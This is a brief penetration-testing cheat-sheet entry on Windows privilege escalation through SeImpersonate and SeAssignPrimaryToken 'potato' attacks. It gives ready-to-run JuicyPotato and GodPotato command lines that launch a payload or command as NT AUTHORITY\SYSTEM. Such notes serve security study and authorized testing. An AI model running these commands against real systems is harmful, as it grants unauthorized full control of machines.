User Privileges

SeImpersonate and SeAssignPrimaryToken

These privileges allow you to immediately escalate to NT AUTHORITY\SYSTEM through "potato" attacks by stealing authentication and using it to impersonate a privileged process token.

If you're running on an older OS, try using the classic JuicyPotato:

.\JuicyPotato.exe -l 1337 -p C:\windows\tasks\win.exe -t *

If you're working with anything reasonably modern, try using GodPotato:

.\GodPotato-NET4.exe -cmd "cmd /c whoami"